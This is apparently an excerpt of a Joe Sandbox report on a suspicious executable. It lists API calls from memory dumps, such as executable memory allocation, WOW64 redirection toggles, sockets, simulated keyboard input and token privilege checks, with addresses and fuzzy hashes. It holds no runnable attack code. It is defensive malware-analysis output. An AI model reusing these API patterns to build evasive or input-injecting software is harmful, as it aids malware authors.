                                                                              • Instruction Fuzzy Hash: 0B21F232600118BFEF129F54CC45FAF3BBAEF89750F028529F940AB2A0C675AC5197A4
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: __calloc_crt
                                                                              • String ID: K$@BL
                                                                              • API String ID: 3494438863-2209178351
                                                                              • Opcode ID: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
                                                                              • Instruction ID: ecd99e2cd8c25bd978de89897c730db32a1f4afae71c84053b65a056749c41d4
                                                                              • Opcode Fuzzy Hash: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
                                                                              • Instruction Fuzzy Hash: 13F0A4713056318BE7A48F15BC51E9A6BD4EB40334F91006BE504CE280EB38B8818A9C
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00404BD0,?,00404DEF,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404C11
                                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00404C23
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                              • API String ID: 2574300362-3689287502
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00404B83,?), ref: 00404C44
                                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00404C56
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                              • API String ID: 2574300362-1355242751
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,00481039), ref: 00480DF5
                                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00480E07
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                                              • API String ID: 2574300362-4033151799
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00478CF4,?,0048F910), ref: 004790EE
                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00479100
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: GetModuleHandleExW$kernel32.dll
                                                                              • API String ID: 2574300362-199464113
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              APIs
                                                                              • CharLowerBuffW.USER32(?,?), ref: 0047E0BE
                                                                              • CharLowerBuffW.USER32(?,?), ref: 0047E101
                                                                                • Part of subcall function 0047D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0047D7C5
                                                                              • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0047E301
                                                                              • _memmove.LIBCMT ref: 0047E314
                                                                              Similarity
                                                                              • API ID: BuffCharLower$AllocVirtual_memmove
                                                                              • String ID:
                                                                              • API String ID: 3659485706-0
                                                                              APIs
                                                                              • CoInitialize.OLE32(00000000), ref: 004780C3
                                                                              • CoUninitialize.OLE32 ref: 004780CE
                                                                                • Part of subcall function 0045D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4
                                                                              • VariantInit.OLEAUT32(?), ref: 004780D9
                                                                              • VariantClear.OLEAUT32(?), ref: 004783AA
                                                                              Similarity
                                                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                              • String ID:
                                                                              • API String ID: 780911581-0
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: Variant$AllocClearCopyInitString
                                                                              • String ID:
                                                                              • API String ID: 2808897238-0
                                                                              APIs
                                                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 004769D1
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004769E1
                                                                                • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00476A45
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00476A51
                                                                              Similarity
                                                                              • API ID: ErrorLast$__itow__swprintfsocket
                                                                              • String ID:
                                                                              • API String ID: 2214342067-0
                                                                              APIs
                                                                              • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0048F910), ref: 004764A7
                                                                              • _strlen.LIBCMT ref: 004764D9
                                                                              Similarity
                                                                              • API ID: _strlen
                                                                              • String ID:
                                                                              • API String ID: 4218353326-0
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 02F5354C
                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02F535D5
                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 02F535E7
                                                                              • __freea.LIBCMT ref: 02F535F0
                                                                                • Part of subcall function 02F532FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 02F5332C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                              • String ID:
                                                                              • API String ID: 2652629310-0
                                                                              • Opcode ID: cd63baf5102623d5c30563df5249179d63fc55b48b52195438fa09967b052014
                                                                              • Instruction ID: e40d61eda26c7e8cf5536e86b4af6973afca1ae674d828071ee01b0ba94201db
                                                                              • Opcode Fuzzy Hash: cd63baf5102623d5c30563df5249179d63fc55b48b52195438fa09967b052014
                                                                              • Instruction Fuzzy Hash: 3031D472A0022A9BDF259F68DC45DAF7BA5EF403D4F0541A8FE05D7250EB35C954CBA0
                                                                              APIs
                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004888DE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: InvalidateRect
                                                                              • String ID:
                                                                              • API String ID: 634782764-0
                                                                              • Opcode ID: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
                                                                              • Instruction ID: 90478ffdb7761b137305382920b909693c76b6b3f52a4c92a5928a084f4746aa
                                                                              • Opcode Fuzzy Hash: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
                                                                              • Instruction Fuzzy Hash: FA31E574600109AEEB20BA18CC45FBE77A4FB09310FD4492FF911E62A1CB78A9409B5F
                                                                              APIs
                                                                              • ClientToScreen.USER32(?,?), ref: 0048AB60
                                                                              • GetWindowRect.USER32(?,?), ref: 0048ABD6
                                                                              • PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
                                                                              • MessageBeep.USER32(00000000), ref: 0048AC57
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                                              • String ID:
                                                                              • API String ID: 1352109105-0
                                                                              • Opcode ID: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
                                                                              • Instruction ID: 50dfaebed92d8c5328ac5b6136a8f20cc44f4ea80b7df437f97558f7e7d7bb38
                                                                              • Opcode Fuzzy Hash: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
                                                                              • Instruction Fuzzy Hash: BA419130600118DFEB11EF58D884A6E7BF5FB48300F1888BBE9149B361D7B4E861CB5A
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00460B27
                                                                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 00460B43
                                                                              • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00460BA9
                                                                              • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00460BFB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                              • String ID:
                                                                              • API String ID: 432972143-0
                                                                              • Opcode ID: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
                                                                              • Instruction ID: 03210f4579a9838ef25ae451a3721c68a31d2690f75eb3d3b5678938ddfb0b3b
                                                                              • Opcode Fuzzy Hash: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
                                                                              • Instruction Fuzzy Hash: 65315970D402086EFB308AA98C05BFFBBA5AB45718F08826BE491512D2E37DA945975F
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 00460C66
                                                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 00460C82
                                                                              • PostMessageW.USER32(00000000,00000101,00000000), ref: 00460CE1
                                                                              • SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 00460D33
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                              • String ID:
                                                                              • API String ID: 432972143-0
                                                                              • Opcode ID: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
                                                                              • Instruction ID: af81f782b9f2afb763cf5164547ef1363043bc47ca8f91e08b3a13bd089ac861
                                                                              • Opcode Fuzzy Hash: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
                                                                              • Instruction Fuzzy Hash: 963135309402086EFF388B658804BBFBB66EB45310F04472FE481622D1E33D9949D75B
                                                                              APIs
                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004361FB
                                                                              • __isleadbyte_l.LIBCMT ref: 00436229
                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00436257
                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043628D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                              • String ID:
                                                                              • API String ID: 3058430110-0
                                                                              • Opcode ID: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
                                                                              • Instruction ID: a268d3a3e6e94a3a382490fbdf87b59e774afa85b5b6ffc4d13239602402ad5c
                                                                              • Opcode Fuzzy Hash: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
                                                                              • Instruction Fuzzy Hash: 8831E230600246BFDF219F65CC48B6B7BB9BF4A310F17906AE82487291DB34D850D754
                                                                              APIs
                                                                              • GetForegroundWindow.USER32 ref: 00484F02
                                                                                • Part of subcall function 00463641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0046365B
                                                                                • Part of subcall function 00463641: GetCurrentThreadId.KERNEL32 ref: 00463662
                                                                                • Part of subcall function 00463641: AttachThreadInput.USER32(00000000,?,00465005), ref: 00463669
                                                                              • GetCaretPos.USER32(?), ref: 00484F13
                                                                              • ClientToScreen.USER32(00000000,?), ref: 00484F4E
                                                                              • GetForegroundWindow.USER32 ref: 00484F54
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                              • String ID:
                                                                              • API String ID: 2759813231-0
                                                                              • Opcode ID: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
                                                                              • Instruction ID: 1d2def75fb9c8d520c96e6582531674793c8a8545b0fc50cd96dbe06c6996e1e
                                                                              • Opcode Fuzzy Hash: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
                                                                              • Instruction Fuzzy Hash: 38314FB2D00108AFCB00EFA6C8819EFB7F9EF84304F00446EE515E7242EA759E058BA5
                                                                              APIs
                                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                              • GetCursorPos.USER32(?), ref: 0048C4D2
                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0043B9AB,?,?,?,?,?), ref: 0048C4E7
                                                                              • GetCursorPos.USER32(?), ref: 0048C534
                                                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0043B9AB,?,?,?), ref: 0048C56E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                              • String ID:
                                                                              • API String ID: 2864067406-0
                                                                              • Opcode ID: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
                                                                              • Instruction ID: 2973952025af683afbaf652597196eb0b77ee17814688135882e4792ee887bd6
                                                                              • Opcode Fuzzy Hash: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
                                                                              • Instruction Fuzzy Hash: CE319335500028FFCF159F58C898EAF7BB5EB09310F44486AF9059B361C735AD50DBA8
                                                                              APIs
                                                                                • Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
                                                                                • Part of subcall function 0045810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
                                                                                • Part of subcall function 0045810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
                                                                                • Part of subcall function 0045810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
                                                                                • Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004586A3
                                                                              • _memcmp.LIBCMT ref: 004586C6
                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004586FC
                                                                              • HeapFree.KERNEL32(00000000), ref: 00458703
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                              • String ID:
                                                                              • API String ID: 1592001646-0
                                                                              • Opcode ID: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
                                                                              • Instruction ID: 730e04a0c9a28b219d77ec22e6a84493cb1498a8cd35620125a6bebab32f77ad
                                                                              • Opcode Fuzzy Hash: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
                                                                              • Instruction Fuzzy Hash: E4215A71E01109EBDB10DFA4C989BAEB7B8EF45306F15405EE844AB242DB34AE09CB58
                                                                              APIs
                                                                              • __setmode.LIBCMT ref: 004209AE
                                                                                • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
                                                                                • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
                                                                              • _fprintf.LIBCMT ref: 004209E5
                                                                              • OutputDebugStringW.KERNEL32(?), ref: 00455DBB
                                                                                • Part of subcall function 00424AAA: _flsall.LIBCMT ref: 00424AC3
                                                                              • __setmode.LIBCMT ref: 00420A1A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                              • String ID:
                                                                              • API String ID: 521402451-0
                                                                              • Opcode ID: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
                                                                              • Instruction ID: 506474fa098cb1490a8c63a0929ef03edd2b6c88ff5c0dc42923ee6bdce5b67a
                                                                              • Opcode Fuzzy Hash: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
                                                                              • Instruction Fuzzy Hash: E31126727041146FDB04B2A5BC469BE77A8DF81318FA0416FF105632C3EE3C5946879D
                                                                              APIs
                                                                              • _free.LIBCMT ref: 00435101
                                                                                • Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
                                                                                • Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
                                                                                • Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00A40000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap_free
                                                                              • String ID:
                                                                              • API String ID: 614378929-0
                                                                              • Opcode ID: a8023bd45059f91bbc3ba768b53d43d26a35538f988b85c4c1a404ec765a44f4
                                                                              • Instruction ID: 565aca9384bc55ec46628ce6f4316e74187f5c3bb682111b66b5609c454c8c26
                                                                              • Opcode Fuzzy Hash: a8023bd45059f91bbc3ba768b53d43d26a35538f988b85c4c1a404ec765a44f4
                                                                              • Instruction Fuzzy Hash: D411E072E01A21AECF313FB1BC05B5E3B989B183A5F50593FF9049A250DE3C89418B9C
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 004044CF
                                                                                • Part of subcall function 0040407C: _memset.LIBCMT ref: 004040FC
                                                                                • Part of subcall function 0040407C: _wcscpy.LIBCMT ref: 00404150
                                                                                • Part of subcall function 0040407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160
                                                                              • KillTimer.USER32(?,00000001,?,?), ref: 00404524
                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00404533
